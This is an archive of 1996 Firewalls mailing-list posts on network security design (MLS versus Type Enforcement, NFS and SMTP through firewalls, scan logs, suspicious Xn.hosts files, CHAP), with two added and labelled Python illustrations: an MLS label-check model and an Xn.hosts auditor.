(Subject: Sick Puppy struggles to appear legitimate)

I have a couple of sniffers in a network, one just inside the firewall and the other right next to the network management system. The last time I looked at these was about six weeks ago and when looking today I see something new.

The DNS running in the firewall used to get about 10 connects every 12 hours from the company's internal mail system but now the firewall DNS is getting about 10,800 connects every day from the network management system (NMS). The sniffer watching the NMS shows that new Windows 95 machines are connecting to it with NetBios on port 137, NetBios Name Service. It looks like the NMS box in turn queries the firewall.

The firewall itself seems to be a Pentium machine, handling about 4,000 incoming messages per day, 3,000 outgoing messages per day and a web user population of about 150 users.

Two questions:
1) will the increased DNS queries cause the firewall performance (throughput/response time) to drop;
2) has anyone else seen a similar situation;
3) how would you stop these evil little Windows 95 weevils from nibbling away at the firewall DNS?

Yeah, I know. Dawgs have trouble counting.
Sick Puppy, the Cat_Eating_Dawg
Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter

From firewalls-owner Fri Feb 2 06:55:17 1996
Date: 2 Feb 1996 09:36:17 -0500
From: "Dan Vukelich"
To: "elbert.lagrew@sunny.health.sta", Firewalls@GreatCircle.COM
Subject: Re: Internet-access from Nov

Reply to: RE>Internet-access from Novell (reply)

I haven't verified this, but I believe Morningstar does IPX filtering.
--------------------------------------
Date: 2/2/96 2:33 AM
To: Dan Vukelich
From: elbert.lagrew@sunny.health.sta
Subject: Internet-access from Novell (reply)

[quoted message deleted]

From firewalls-owner Fri Feb 2 09:23:29 1996
Date: Fri, 2 Feb 96 08:36:12 PST
From: Bill Stout
Message-Id: <9602021636.AA03693@osc.hitachi.com>
To: sgcccdc@citec.qld.gov.au (Colin Campbell)
Subject: Re: How secure can a screened host be?
Cc: Firewalls@GreatCircle.COM

>> I have a theoretical configuration where I would like to use a screened
>> host, AND Cisco policy routing. The bennies would be the ability to
>> firewall multiple links with one router. My concern is the overall security
>> of such an arrangement in comparison to a true DMZ.
>>
>>
>>
>> Business partner---Router----Internal Net(s)
>>                   /  |  \
>>        Internet--/   |   \---Firewall
>>                      |
>>                Web Server(s)
>>
>
>My problem with this is that your firewall/bastion is neither logically
>nor physically between the internet router and the internal net(s).
>...
>Colin

Same initial thoughts here. 'By the book Firewall design' logic would state there are obvious design flaws here. But the books were written before Cisco introduced 'policy routing', where all traffic from specific ports is sent to a specific IP address, which would be the firewall. The logical layout would then be:

Business partner
                \
                 Firewall----Internal networks
                /        \
        Internet          Web Servers

Any additional segments can be directed to the Firewall also.

BTW - This is a sanity check, I want to find errors with this configuration.

William B. Stout
Senior Systems Administrator
Hitachi Data Systems
Open Systems Center
Santa Clara, California

From firewalls-owner Fri Feb 2 09:38:31 1996
Date: Sat, 3 Feb 1996 01:15:35 +0800
From: "Mikolaj J. Habryn"
Message-Id: <199602021715.BAA00155@midian>
To: matt@maverick.itd.uts.edu.au
CC: fina@novo.dk, firewalls@GreatCircle.COM
In-reply-to: <199602012132.IAA17213@maverick.itd.uts.edu.au> (matt@maverick.itd.uts.edu.au)
Subject: Re: NIS+

>>>>> "Jas" == Jas (Matthew K) writes:

Jas> Finn T Andersen wrote this...

>> There has been a lot of good information and suggestions about
>> NIS recently, however, no one has mentioned anything about NIS+.
>> I have heard that NIS+ should be a very secure system, but in
>> fact I have never heard about anyone who was using it. Is it
>> available, and on what platforms ?

Jas> yes, NIS+ is far more secure than NIS. It uses SecureRPC to
Jas> form the underlying basis of its security, and uses access
Jas> control lists for data in the tables (even down to individual
Jas> table entries. ie everyone owns their own passwd entry so you
Jas> can only see your own encrypted password field). it also
Jas> supports network encryption of certain fields (down to
Jas> individual entries within a table entry) on versions shipped
Jas> within the US.
Jas> SecureRPC is based on Diffie-Hellman for key

hi - i'm considering setting up a centralized password database for a local net consisting of linux/sun/next boxen - is NIS+ freely available, or is it proprietary? can you send me some pointers to any relevant info?

thanks for your time.

mjh

From firewalls-owner Fri Feb 2 10:12:11 1996
Date: Fri, 2 Feb 1996 09:56:17 -0800 (PST)
From: jgt10@amdahl.com (John G. Thompson)
To: firewalls@greatcircle.com
Subject: Re: Mandatory protection (was: product selection)
In-Reply-To: <9602012337.AA04194@garrison.com.> from "Jeromie Jackson" at Feb 1, 96 05:37:50 pm

Jeromie Jackson wrote:

> I would propose a different use for the MLS architecture.
>
>
> outside---o.proxies----i.proxies-----inside
>
>
> o.proxies have level of '1'.
> i.proxies have level of '2'.
>
>
> o.proxies do not have access to write to the inside ethernet interface.
> i.proxies have privilege to read o.proxies based on label being
> dominant.
>
> From what I see, this would make a connection-based attack useless.
> You could break into the firewall and subvert the o.proxies. Data-based
> attacks could potentially succeed if neither proxy noticed the signature.
> Connection based attacks would be limited to harming the level '1' environment.
>
> I would be interested in hearing comments...

About 4 years ago I worked with a group of engineers to design an internet firewall using a B1 operating system. We thought of the above idea, almost exactly.

level
  SYSHI      - audit data, sources
  RESTRICTED - sys admin sources, tools
  USER       - Access to internal network
  NETWORK    - Access to external/internet
  SYSTEM     - Executables, configurations, reference data

The more we looked at how to implement that architecture and provide other user services, the more complicated the picture became. We knew we would have to re/train the users in MLS concepts and what new functions they would need to understand and use to get data from one level to another. Finally, I asked the question, WHAT ARE WE TRYING TO PROTECT? Everyone against themselves, or the integrity of the system?

Since we were trying to provide a raft of services that required a user account on the system (this was before socks and about 2 years before http appeared) we decided that the full blown environment would work, but it wouldn't serve the needs of the company or the users.

We changed the focus of the security policy. Protect the system integrity from attack. We decided that if we protected the operating system and server software, the executables and configurations from unauthorized modification, we could prevent the majority of attacks from outside and inside that would disrupt the services we were trying to provide. We quit trying to use all of the MLS features to make absolutely sure that the servers and the users could NEVER interfere with each other.
Instead, we focused on providing a platform that would make it extremely hard to subvert either the operating system or the servers while providing as close a look and feel as possible to the non-MLS operating system. We couldn't easily regulate the flow of data between the inside and outside networks, between some of the subsystems, and between users without making the system labor intensive to make and maintain, so we decided to accept the risk of running the almost identical software run elsewhere. We did have to make some modifications to close some loopholes and make some programs run correctly in an MLS environment.

Since we couldn't spend days training new users on MLS concepts and commands, we created a system that was as close to the non-MLS version of the operating system as possible. Most users never really noticed the difference. The users that noticed the difference, or ran into a problem due to the MLS environment, were ones we wanted to talk to anyway. They were the ones trying to add a new service, or enhance existing ones. We had a few people join the ranks of the unofficial system admin crew by enlisting their aid in providing that service within the security profile of the system.

JGT
--
John G. Thompson      jgt10@amdahl.com      1-408-992-2088
Amdahl Corporation, P.O. Box 3470 MS 383, Sunnyvale, CA 94088-3470
[The opinions expressed are MINE. They do not necessarily reflect the policies, procedures, press releases or opinions of the Amdahl Corporation.]
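The two-level proxy layout Jeromie Jackson proposed, and the question John Thompson's group ran into about what the labels actually enforce, can be checked with a small model. The Python below is an added illustration, not code from the thread or from any MLS product; the object names (OUTSIDE_IF, INSIDE_IF, O_SPOOL) and the label assignments are assumptions. It shows that under the classic *-property, which permits writing up, level-1 o.proxies could still write the level-2 inside interface, so the isolation Jackson describes depends on a write-equal rule for untrusted processes.

```python
"""Toy model of the MLS label checks behind the two-level proxy firewall
sketched above (o.proxies at level 1, i.proxies at level 2).

Added illustration, not code from the list thread or from any MLS product.
The object names (OUTSIDE_IF, INSIDE_IF, O_SPOOL) and the label assignments
are assumptions chosen to show which write rule the design depends on.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Label:
    level: int                        # hierarchical level: 1 = outside, 2 = inside
    cats: frozenset = frozenset()     # non-hierarchical compartments (empty here)

    def dominates(self, other: "Label") -> bool:
        """Lattice order: higher-or-equal level and a superset of compartments."""
        return self.level >= other.level and self.cats >= other.cats


def can_read(subject: Label, obj: Label) -> bool:
    """Simple security property (no read up): the subject must dominate the object."""
    return subject.dominates(obj)


def can_write(subject: Label, obj: Label, write_up: bool) -> bool:
    """Two common write rules.

    write_up=True : classic *-property, the object must dominate the subject,
                    so writing to a higher label is permitted.
    write_up=False: "write-equal", the subject may only write objects at its own
                    label; many MLS systems apply this to untrusted processes.
    """
    if write_up:
        return obj.dominates(subject)
    return subject == obj


# Assumed labels for the layout in the thread.
O_PROXIES = Label(1)      # outside proxies
I_PROXIES = Label(2)      # inside proxies
OUTSIDE_IF = Label(1)     # outside ethernet interface
INSIDE_IF = Label(2)      # inside ethernet interface
O_SPOOL = Label(1)        # data o.proxies leave for i.proxies to pick up

# What the proposal needs: (description, subject, operation, object, must_be_allowed)
REQUIREMENTS = [
    ("o.proxies write outside interface", O_PROXIES, "write", OUTSIDE_IF, True),
    ("o.proxies write hand-off spool",    O_PROXIES, "write", O_SPOOL,    True),
    ("i.proxies read hand-off spool",     I_PROXIES, "read",  O_SPOOL,    True),
    ("i.proxies write inside interface",  I_PROXIES, "write", INSIDE_IF,  True),
    ("o.proxies write inside interface",  O_PROXIES, "write", INSIDE_IF,  False),
    ("o.proxies read inside interface",   O_PROXIES, "read",  INSIDE_IF,  False),
]


def decide(subject: Label, op: str, obj: Label, write_up: bool) -> bool:
    """Access decision for one (subject, operation, object) under a write rule."""
    if op == "read":
        return can_read(subject, obj)
    if op == "write":
        return can_write(subject, obj, write_up)
    raise ValueError(f"unknown operation {op!r}")


def violations(write_up: bool) -> list:
    """Requirements the labels fail to enforce as the proposal intends."""
    return [
        desc
        for desc, subj, op, obj, expected in REQUIREMENTS
        if decide(subj, op, obj, write_up) != expected
    ]


if __name__ == "__main__":
    for write_up, name in ((True, "classic *-property"), (False, "write-equal")):
        bad = violations(write_up)
        verdict = "holds" if not bad else "fails on: " + ", ".join(bad)
        print(f"{name:20s} {verdict}")
```

The `cats` field lets the same check be repeated with non-hierarchical compartments, which is how an MLS configuration separates data at the same level.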
From firewalls-owner Fri Feb 2 10:23:43 1996
Message-Id: <9602021404.AA18008@mordred.sware.com>
Subject: Re: Mandatory protection (was: product selection)
To: smith@sctc.com (Rick Smith)
Date: Fri, 2 Feb 1996 09:04:35 -0500 (EST)
From: Charles Watt
Cc: firewalls@greatcircle.com, smith@sctc.com, watt@sware.com
In-Reply-To: <199602012355.RAA16089@shade.sctc.com> from "Rick Smith" at Feb 1, 96 05:55:26 pm

>
> Charles Watt writes:
>
> >Actually, Rick, your analysis below does show a lack of
> >understanding in the capabilities of most MLS systems. Your
> >analysis assumes that the MAC labels enforced by such systems
> >are strictly hierarchical, e.g.:
>
> Excuse me, but I doubt you could do any of this without categories
> and/or compartments. I am surprised that you could infer their absence
> from that message. MLS couldn't come even close to competing with type
> enforcement if it lacked non-hierarchical labels.
>
> >Here your understanding of MLS networking breaks down. Read
> >the existing standards, such as RFC 1108 or the DoD's Common Security
> >Label spec.
>
> Naturally I've read various IPSO specs.
>
> Labeled IP is largely irrelevant to the firewalls marketplace today,
> and I suspect they will remain so for the next few years (perhaps an
> interesting topic for a different thread). We sell very, very little
> to sites that use labeled IP protocols. Most people need to
> interoperate with standard hosts operating without IPSO labels.

Rick, either everyone else on this list with experience in MLS systems is incapable of explaining a point clearly, or you have an amazing ability to ignore their points in your zeal to promote the Sidewinder and Type Enforcement (TE). But then, you are marketing, right?

Reread my message. It had nothing to do with labeled IP. It simply used the security features provided by a typical MAC-enforcing protocol stack to duplicate the features of a system based on TE. No labels for network data required.

Does this work? Of course. Our SecureWeb platform (www.secureware.com/papers/secureweb/) makes use of MAC to create the only platform truly secure enough for high value electronic commerce -- we have banks on the web today offering full-service accounts to their customers through the SWP. And when we ran our own "challenge" at the Retail Delivery Show in November (I take no responsibility for such disgusting marketing drivel), we at least had the confidence to offer a Trans Am convertible rather than a T-shirt to any successful attacker. And we gave all participants direct root access to the system (in the "outside" partition, of course).

> >Now I'm not an expert on Type Enforcement, but we do have a couple
> >of ex-SCC developers here. We've discussed the pros/cons of
> >TE vs. MLS at length for quite some time and have come to the conclusion
> >that ANYTHING that can be done with TE can also be done with MLS and
> >vice versa. Of course the architectures are different, and some
> >problems fit more naturally with one or the other approach.
> >But the
> >capabilities are virtually identical, particularly when applied to
> >firewalls and similar separation problems.
>
> The bottom line is, of course, that both are forms of mandatory access
> control. We all agree on that point. (Hi, Barry).
>
> Rick.
> smith@sctc.com secure computing corporation

Fine. You've got a nice system. Its use of TE-based MAC gives it some definite competitive advantages over those systems that do not use MAC, if integrated and administered properly. But TE provides no advantage over a similar system based on MAC, such as the Harris firewall. There you must compete based upon other features, such as better application support or ease of administration.

Charles Watt
SecureWare, Inc.

From firewalls-owner Fri Feb 2 10:38:38 1996
Date: Fri, 2 Feb 96 10:26:39 PST
From: igood@mprgate.mpr.ca (Ian Good)
Message-Id: <9602021826.AA23441@edzo.mpr.ca>
To: Firewalls@GreatCircle.COM
Subject: NFS services and firewalls

Good morning (PST).

We have a requirement to provide a network mountable filesystem in a shared development environment between the firewalls of ours and another company. Our development team requests that this file system be mountable inside our firewall. Following is our proposed configuration. All of the NFS traffic between the server and the two companies should pass through the firewall.
We are trying to protect the server as much as possible by putting it behind the firewall but still not inside; i.e., not on the same "side" of the firewall as the rest of the company.

                          _________
      us        -------|_  fw-1  _|---------        them
   NFS clients         |   \   /   |             NFS clients
                       |__\___/__|
                           __|___
                          | NFS  |
                          |server|
                          |______|

Under this configuration, is it possible for 'us' to achieve a high level of security for our internal network? We understand that FW-1 v2.0 makes it possible to selectively pass NFS (v2) traffic through the firewall. We would make the server as secure as possible with almost no logins, functionally limited to the main task of serving NFS, and only NFS mount connections permitted incoming from them. From our side to the server, appropriate outgoing access for management and NFS client connections.

Can anyone comment on this configuration and the exposures inherent in it? How easy is it for someone to compromise internal hosts via the NFS server? If there is a serious problem with this, would using NFS (v3) significantly improve things?

Ian H. Good              (604) 293-5113         igood@mpr.ca
MPR Teltech Ltd.
fax (604) 293-5787       http://www.mpr.ca/
Burnaby BC Canada V5A-4B5

From firewalls-owner Fri Feb 2 10:56:53 1996
From: williams@va.arca.com (Jeff Williams)
Reply-To: williams@va.arca.com
To: Firewalls@GreatCircle.COM
Subject: Firewall API's
Date: 02 Feb 1996 17:46:49 GMT
Message-Id: <256176126.339531179@va.arca.com>
Organization: Arca Systems, Inc

We're in the middle of a firewall selection effort and we need some help. We're wondering whether or not it is common practice to provide an API so that we can create our own proxy applications if we want to. At least one vendor has said "No way". Is it reasonable to expect such an API with a firewall product? What's the best way to find out which ones do or do not?

Thanks in advance for any help,
--Jeff

From firewalls-owner Fri Feb 2 11:16:30 1996
Date: Fri, 2 Feb 1996 18:42:42 GMT
From: bret@real.com (Bret McDanel)
Message-Id: <199602021842.SAA04935@real.com>
To: firewalls@greatcircle.com
Subject: Re: Scanning from afar...
> Has anyone seen this type of network scanning before? Addresses have been
> changed to protect the innocent and the guilty.
>
> Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp
> X.X.143.14(39620) -> X.X.211.227(80), 1 packet
>
> The node in question here has scanned a few other subnets looking for
> connections to port 80. Is this a recognised scanning program or something
> home grown?
>

It looks like someone is scanning for HTTPD.. Maybe someone is really anxious to read your web pages :)

From firewalls-owner Fri Feb 2 11:27:53 1996
Date: Fri, 2 Feb 1996 13:55:21 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: Re: Scanning from afar

Looks a bit similar to ICMP redirect packets, which are basically telling your router that the shortest route to one system is through another system (where some kewl d00d usually waits for your packets). A lot of lamers can't tell the difference between a router and a firewall so they hit the firewall with router tewlz. Definitely ! 3L33T. (Not elite, lamer.) I was watching some d00d from .my doing this kind of stuff, but he was elite and kept seeing me watch him. Each time I connected to his system he bailed out. Don't care anyway.
It don't matter that a dawg don't know where .my is.

Sick Puppy, the Cat_Eating_Dawg
Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter
-=:( Chained, whipped, beaten and severely abused in Hillary's Dungeon ):=-
-=:( Yeah, that's it, beg Mother Newt ):=-
Stop it Bill. NO Bill. Ooooh Bill. Yes Bill. Right there Bill.
(Gotcha. Bill was only stroking the cat)

From firewalls-owner Fri Feb 2 11:33:26 1996
Message-Id: <199602021849.MAA12094@solen.gac.edu>
To: Prakash N Purushotham
cc: "'firewalls@greatcircle.com'"
Subject: Re: X#.hosts in /etc directory
In-reply-to: Your message of "Fri, 02 Feb 1996 09:23:00 PST." <31124A6A@gangotri.mindware.soft.net>
Date: Fri, 02 Feb 1996 12:49:10 -0600
From: Philip Guenther

Prakash N Purushotham writes:
>Yesterday when I was backing up my DNS databases and Mail databases,
>I found several instances of files with names
>
>X0.hosts, X1.hosts .... X7.hosts
>
>All these files were created on 27 Jan, 1996 (Saturday, non-working day)
>with nearly the same time-stamps.
>
>Could this mean that my network is under attack? I did not find
>anything suspicious in the syslog and sulog files.

Your machine probably is under attack. To quote the Xserver manpage:

     The X server also uses a host-based access control list for
     deciding whether or not to accept connections from clients on
     a particular machine.
     If no other authorization mechanism is being used, this list
     initially consists of the host on which the server is running
     as well as any machines listed in the file /etc/Xn.hosts, where
     n is the display number of the server. The file contains either
     an Internet hostname (e.g. expo.lcs.mit.edu) or a DECnet hostname
     in double colon format (e.g. hydra::). Each hostname must be
     newline separated with no leading or trailing whitespace. For
     example:

          joesworkstation
          corporate.company.com
          star::
          bigcpu::

     Users add or remove hosts from this list and enable or disable
     access control using the xhost command from the same machine as
     the server.

If those files contain any hostnames, you are susceptible to X connections from those hosts. Remove the files and restart your Xserver immediately.

Philip Guenther
----------------------------------------------------------------
Philip Guenther                UNIX Systems and Network Administrator
Internet: guenther@gac.edu     Phonenet: (507) 933-7596
Gustavus Adolphus College      St. Peter, MN 56082-1498
Source code never lies (it just misleads). (Programming by Purloined Letter?)
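The reply above boils down to a check an administrator can script: which /etc/Xn.hosts files exist, and which hosts each one would admit. The following is an added example written for this page, not code from the poster or from the X distribution; the directory to scan is a parameter, and make_demo_dir() builds constructed sample files shaped like the ones in the question.

```python
"""Audit the /etc/Xn.hosts files an X server consults for access control.

Added example, not code from the original post.  With no other
authorization mechanism in use, the X server admits every host named in
/etc/Xn.hosts (n = display number) to display n without further checks,
so unexpected files like the X0.hosts .. X7.hosts above deserve review.
The directory is a parameter so the audit can be run on a live system
or on a copy of /etc; make_demo_dir() builds constructed sample files.
"""
import re
import tempfile
from pathlib import Path

# Filename pattern the X server uses: X<display number>.hosts
XHOSTS_NAME = re.compile(r"^X(\d+)\.hosts$")


def parse_xhosts(text):
    """Parse one Xn.hosts file into (host, kind) tuples.

    Format (from the manpage quoted above): one hostname per line,
    newline separated, no leading or trailing whitespace; DECnet names
    end in '::' (hydra::).  Blank lines are skipped.  Lines containing
    whitespace are kept but marked 'malformed', since the server would
    not match them as written and they still merit a look.
    """
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if any(ch.isspace() for ch in line):
            kind = "malformed"
        elif line.endswith("::"):
            kind = "decnet"
        else:
            kind = "internet"
        entries.append((line.strip(), kind))
    return entries


def audit_xhosts(directory):
    """Return {display number: [(host, kind), ...]} for every Xn.hosts
    file in directory.  An empty list means the file exists but grants
    nothing; other files (e.g. /etc/hosts) are ignored."""
    found = {}
    for path in sorted(Path(directory).iterdir()):
        m = XHOSTS_NAME.match(path.name)
        if m and path.is_file():
            found[int(m.group(1))] = parse_xhosts(path.read_text())
    return found


def exposed_displays(directory):
    """Display numbers whose Xn.hosts admits at least one host.  An empty
    result is the state the reply asks for (files removed or empty)."""
    return sorted(n for n, hosts in audit_xhosts(directory).items() if hosts)


def make_demo_dir():
    """Constructed sample data (not from any real system): three files
    named like the ones in the question, one of them empty, plus an
    unrelated file that must be ignored."""
    d = Path(tempfile.mkdtemp())
    (d / "X0.hosts").write_text("joesworkstation\ncorporate.company.com\n")
    (d / "X1.hosts").write_text("star::\nbigcpu::\n")
    (d / "X7.hosts").write_text("")
    (d / "hosts").write_text("127.0.0.1 localhost\n")
    return str(d)


if __name__ == "__main__":
    demo = make_demo_dir()
    for display, hosts in audit_xhosts(demo).items():
        print(f"display :{display}  ({len(hosts)} host(s) admitted)")
        for host, kind in hosts:
            print(f"    {host:28s} {kind}")
    print("exposed displays:", exposed_displays(demo))
```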
From firewalls-owner Fri Feb 2 13:27:11 1996
Date: Fri, 2 Feb 1996 15:52:42 -0500
From: Chris Eastman
Subject: proxy smtp
To: firewalls@greatcircle.com

Earlier there was a post about a socks-type smtp relay client. Basically what I want to do is have an external machine for mail only, and have it forward all traffic for a particular domain to an internal NT machine. Anyone have any suggestions as to which proxy type application to use for this?
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Christopher Eastman      %% Cable & Wireless, Inc   %%
%% MDS Network Engineer     %% 1919 Gallows Road       %%
%% chris@cwi.net            %% Vienna, VA 22182        %%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

From firewalls-owner Fri Feb 2 13:27:24 1996
Date: Fri, 2 Feb 1996 14:58:05 -0500
Message-ID: <1126f930@adp-es.com>
From: jtriana@adp-es.com (Jorge Triana)
Subject: Help with Sun-OS/Raptor Firewall
To: firewalls-digest@GreatCircle.COM

I'm hopeful of 2 things:
First - I'm posting to the right area (if not, nicely tell me where to go).
Secondly - Hope someone can help!!!!!

I have a Raptor Eagle 3.0 firewall running on a Sun SparcStation 2.0 running SunOS 4.1.4 (SOLARIS VERSION COMING SOON). The machine has two token ring cards, one for each of the net sides (unprotected and protected). On the protected internal network side, I have a cisco router that is my gateway to the rest of the internal network. I am running IGRP in the internal network and also RIP on that router so that all my routing tables are redistributed into the ring where the Sun is connected to.
On the unprotected side going to the internet, I have another cisco router running rip and going out to the rest of the world.

My problem is such: From the SUN workstation, I can ping to the outside world, internet and such, without a problem. I have routes to the rest of the world. I can't, however, ping anything beyond my directly connected devices that are on the protected ring. That is, any other subnet that is not directly connected to the subnet where the sun is, is not accessible. Doing a netstat -rn shows only the two directly connected subnets, the loopback and the default router entry. I'm not running any DNS or YP or BIND on this machine or anywhere else. I have an /etc/domainrouter entry with it being the router going to the internet. (IF I change and make the default router the one going to my internal network, then I can ping internally, but nothing out in the internet.) If I have no default router entry, then it starts routed and things really get interesting. (SEE BELOW)

I have a sniffer on the protected ring and I see the RIP route broadcasts emanating from the cisco router into the ring. I don't see the SUN doing anything but exchanging MAC address information. There is no RIP traffic coming from the SUN workstation. (I thought that SUN w/stations normally run RIP to formulate their routing tables!!)

I have done the following with the following results:

- Removed the default router entry.... Doing this causes routed to start. Before routed starts, there is no traffic emanating from the workstation. As soon as I type routed -q and hit enter, the workstation gets over 100 rip-derived routes forwarded to it by the router. The sun box shows the entries when a netstat -rn command is entered. After approx 1 minute, the routing tables are flushed in the sun and only 24 routes are kept. These 24 routes are being sent by the router every 30 seconds as part of the RIP update.
The sun never seems to acknowledge the route packet, so the router keeps sending the same. The only time that the SUN workstation is caching the routes is when the routed command is issued, and then the routes are flushed after 1 minute. I have added static routes to the inside network with no success.

Does anybody have any ideas? Please reply to jtriana@adp-es.com.....

Thanks...for any help..

From firewalls-owner Fri Feb 2 13:57:43 1996
From: nicholscs@agedwards.com (Nichols,Christopher)
To: firewalls@greatcircle.com ('SMTP: firewalls@greatcircle.com')
Message-Id: <1996Feb02.132500.1093.27907@igate.agedwards.com>
Organization: A.G. Edwards & Sons Inc. St. Louis
Date: Fri, 02 Feb 1996 13:27:17 -0600
Subject: CHAP Authentication

This is a general security related question relating to incoming communications into a router, specifically a remote user dialing into a router attached to an applications server. I have to make an argument comparing/contrasting the security levels between CHAP authentication and Token Authentication. The argument has been successfully made that Token authentication is generally considered to provide superior authentication. From a management viewpoint the question becomes: CHAP is basically free (manhours and implementation) vs. Token which can be expensive; therefore tell us why CHAP is inferior to Tokens for perimeter security? What threats does CHAP pose? Has CHAP been successfully penetrated? By what methods? I have read the RFCs on PPP and Authentication but am still unable to apply this to a real world threat.

Thanks,
Chris
nicholscs@agedwards.com

From firewalls-owner Fri Feb 2 14:11:40 1996
To: Firewall List
From: Ian Johnstone-Bryden
Subject: Re: Mandatory protection (was: product selection)
Date: Fri, 02 Feb 96 11:55:29 GMT

Reading the exchange on Multi Level Security vs Type Enforcement, the two factors which come out strongly are the vendor vested interests and the way DOD does things.
Vendor vested interest is understandable. If anyone invests time and money in working with a particular architecture they should believe in what they are doing and have a strong opinion, right or wrong. Where the vendor is a hardware supplier, the primary interest is in selling the hardware. The software component is just a means to an end. In today's environment of cloned product, open systems (UNIX), and quasi open systems (Microsoft), it can be tough differentiating a hardware product. Some of the small hardware vendors have followed a series of attempts to sell product by packing Ada, or real-time UNIX, or today firewall software, in the hope that this will enable them to sell well designed and manufactured hardware which happens to be rather more costly than commodity product in their field. If that helps them sell tin, good luck to them. OTOH maybe they need to take a hard look at what they are trying to achieve, how they are costing product, and how they are trying to market it. In some cases they would have achieved greater success by ceasing hardware production and developing their software skills, but then so few organisations spend time creating the enterprise policy which makes them question and review against a prime objective.

Vendor vested interest aside, how US DOD does things does not decide how technology can be best employed to solve specific problems in specific cases. It doesn't even mean that a US DOD approach is the best option even within DOD. When TCSEC was developed, it was originally intended to form a general computing standard, but it just happened to become a government mechanism and ended up more as a US Federal G procurement mechanism than a method of addressing risk. Because of organisations like NATO, TCSEC got exported and particular countries, like the UK, found that it didn't do everything they felt they needed.
The result was they set up their own systems, but based them on TCSEC in recognition that much of their computer hardware, if not their software, came from US based corporations that handled trusted products through their Fed Sales teams. Although there have been many invitations down the years, the general IT industry and commerce have failed to participate strongly in the development of computer security criteria. That's resulted in criteria being written mainly in government and academic language. In turn that makes it very easy for people to try to think within the constraints of someone else's box - but you don't have to.

The application of technology can be more important than the technology. After all IBM didn't conceive the technology of the PC just to make Bill Gates rich. That happened because Bill saw some opportunities and ruthlessly pursued them. If we take the time to look back through history, some of the greatest advances have been made by applying technology in ways which the original developer never intended.

MLS was originally designed for a specific perceived government need and directly related to the hierarchical structure of government classification systems. The weakness of that approach in commercial applications is that much traditional government business is done within that organisation and even within a sub-set. DOD shares a classification system with the rest of the US Government but may apply it differently. It may also deal with other external organisations like NATO and UK Government. Theoretically the classification system is universal. In reality it isn't. The US and UK Governments continue to confuse each other by using similar classification terms to mean different things and having some unique classifications. Even in simplified examples, classification is not truly hierarchical. A data item classified 'Secret' is not available to every person who is cleared to read up to and including 'Secret'.
Even within the classification, everyone in a particular division cleared at that level doesn't get access, and different data items at 'Secret' have different sensitivities. MLS just reflects that set of requirements. Not all systems which meet B1 levels and have MLS capability to meet the MAC requirements work in exactly the same way.

Every firewall should be built to meet the specific requirements of the organisation it serves to protect. Therefore two firewalls might employ the same basic technology but be configured very differently. Some government users employ gateways with MLS type technology where the technology simply provides two compartments which are protected from each other. Moving data from one compartment to the other is under manual control and there are only two conditions - untrusted public and trusted internal sensitive. Other users employ the technology, together with additional technology, to allow a level of automation but still have only two levels. Some users employ the same technology in a largely automated manner where several levels apply on both sides of the wall. In all these cases the systems could be described as firewalls; only one of them really employs MLS widely, but all of them make use of the fact that the technology has been extensively tested through independent evaluation and active penetration testing and has a known behaviour. In most cases, the certification of components is only one part of the measurement, and site accreditation has been employed to ensure that the complete system (and that means all of the procedures and the administration) complies with a carefully analysed risk assessment and risk policy.

In commercial application, and increasingly in government applications for that matter, one problem is that two or more people may need to exchange sensitive data but do not use the same classification systems.
For example, a corporation may have its own classification system which includes labels like 'Company Confidential'. It needs to exchange data with another enterprise which may also use the same labels but use the labels in a very different way and mean very different things. Equally, it might not even use the same terms in any way. Evaluation criteria assume that classification is under a central control and common through all linked systems and their links. If not, the only data exchange permitted is at 'Unclassified'. Once 'Unclassified' data has been moved internally to a classified level, it can only move down again if the security officer declassifies it. Therefore in a firewalling sense, data is received from an external source at 'unclassified' but is then moved into a work area at 'Company Confidential'. The internal user then wants to respond by email but is stopped by the system because he is attempting to take what is now classified data to an unclassified only destination. To achieve transmission, the internal user has to permit the security officer to decide if an exception can be granted.

Where the technology is very useful is that all of this process is tracked by the trusted audit system. If in the process General Motors discloses highly sensitive information to Ford Motor Company because a security officer made the wrong decision, it is possible to identify who was responsible and when. Given that information, damage limitation may be possible and sanctions can reduce the probability of the situation being repeated.

In a situation such as the example, it would not make sense to build a firewall which automatically allowed classified data to pass from A at 'Company Confidential' to B at 'Company Confidential'. That does not mean that a firewall with MLS technology is inappropriate. It just means that the designers and administrators have to decide how they should use the technology and also why they should use it.
A number of military systems over the years have failed because someone decided to specify B1 certified product because X% of data was classified at 'Secret' and assumed that that was all they needed to do.

MLS can be employed to cover the same applications as TE and TE can cover applications covered by MLS. Which you choose depends on your own detailed assessment of need. Which product containing MLS you choose also depends on your assessment of need and factors like cost. How you implement MLS also depends on your requirements. The fact that the technology allows you to set a number of classification and sensitivity levels doesn't mean you have to do it that way. You would typically employ at least two levels in a firewall but you could use many more and they don't have to match on both sides.

One use is to take data from the untrusted public domain into a protection compartment. You might then have it move into a sanitation compartment where it is automatically checked for hostile code. If it looks hostile, someone decides what to do with it and it only moves from there under manual control. It is still on the 'outside', but you already have two compartments. Automatic transfer across the primary barrier may be nothing more than a method of saying the data has been checked for obvious risks but is still untrusted. OTOH you could extend the use of the technology with combinations of system or manual checks to create an MLS environment inside. You may also be able to pass data in and out between known external addresses using the label system you use internally, and this may include the use of other mechanisms to provide a level of protection (such as encryption) to the data as it transits the public untrusted networks.

The choices are almost unlimited. This makes a real risk policy essential. Alternatively you can take a simple firewall approach and assume inside is trusted and outside is untrusted, but that will one day give you an unpleasant surprise.
